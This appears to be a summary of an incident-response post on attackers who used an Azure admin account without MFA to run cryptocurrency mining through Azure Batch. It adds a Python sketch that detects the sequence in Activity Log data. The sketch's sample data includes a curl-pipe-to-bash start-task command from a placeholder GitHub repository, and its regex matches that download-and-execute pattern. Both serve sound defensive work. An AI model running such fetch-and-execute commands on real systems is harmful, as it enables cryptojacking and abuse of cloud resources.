Attackers compromised an Azure administrator account without MFA to exploit Azure Batch for cryptocurrency mining. They created batch accounts, requested quota increases through Microsoft support, and deployed Ubuntu pools with malicious start tasks that downloaded scripts from GitHub. These scripts installed Docker and ran mining containers, demonstrating how cloud compute resources can be abused for cryptojacking. The post provides detailed forensic analysis of Azure logs, attacker techniques, and the malicious Docker container configuration used for mining operations.
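The three-step sequence above (Batch account creation, a support-ticket quota request, and a pool whose start task pulls a script from GitHub and executes it) can be correlated per caller in Azure Activity Log data. The following detection sketch is an added example, not code from the original post; the record layout, field names such as `startTaskCommandLine`, and the sample records are constructed assumptions to adapt to your own log export.

```python
import re

# Constructed sample records in an Azure Activity Log-like shape (assumption:
# field names and the presence of the start task command line depend on your export).
SAMPLE_RECORDS = [
    {"operationName": "Microsoft.Batch/batchAccounts/write",
     "caller": "admin@example.invalid", "properties": {}},
    {"operationName": "Microsoft.Support/supportTickets/write",
     "caller": "admin@example.invalid",
     "properties": {"title": "Quota increase for Batch dedicated cores"}},
    {"operationName": "Microsoft.Batch/batchAccounts/pools/write",
     "caller": "admin@example.invalid",
     "properties": {"vmImage": "Ubuntu",
                    "startTaskCommandLine": "/bin/bash -c 'curl -s "
                    "https://raw.githubusercontent.com/PLACEHOLDER-ORG/repo/ba.sh | bash'"}},
    {"operationName": "Microsoft.Compute/virtualMachines/write",
     "caller": "ops@example.invalid", "properties": {}},
]

BATCH_PREFIX = "Microsoft.Batch/batchAccounts"
# Download-and-pipe-to-shell from GitHub, as in the post's start tasks.
REMOTE_SCRIPT_EXEC = re.compile(
    r"(curl|wget)\b.*\b(github\.com|githubusercontent\.com)\b.*\|\s*(ba)?sh", re.I)


def classify(record):
    """Tag one record with the step of the cryptojacking sequence it matches, or None."""
    op = record.get("operationName", "")
    props = record.get("properties") or {}
    if op == f"{BATCH_PREFIX}/write":
        return "batch-account-created"
    if op.startswith("Microsoft.Support/") and "quota" in props.get("title", "").lower():
        return "quota-increase-requested"
    if op == f"{BATCH_PREFIX}/pools/write":
        if REMOTE_SCRIPT_EXEC.search(props.get("startTaskCommandLine", "")):
            return "pool-with-remote-script-start-task"
        return "pool-created"
    return None


def correlate(records):
    """Group matched steps by caller so the full sequence can be spotted per identity."""
    by_caller = {}
    for rec in records:
        tag = classify(rec)
        if tag:
            by_caller.setdefault(rec.get("caller", "?"), []).append(tag)
    return by_caller


def suspicious_callers(records):
    """Callers that performed all three steps; review these identities and their MFA state."""
    needed = {"batch-account-created", "quota-increase-requested",
              "pool-with-remote-script-start-task"}
    return sorted(c for c, tags in correlate(records).items() if needed <= set(tags))
```

A single pool creation with a benign start task only yields `pool-created`, so the alert fires on the combination of steps rather than on normal Batch use.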
Table of contents

- Introduction
- Background
- Attacker’s action
- Conclusion
- Appendix A - ba.sh
- Appendix B - 00ca23e288f0686e5721b097f9617e2a05ad84508e84f0c27dee2c97261ae0a1.json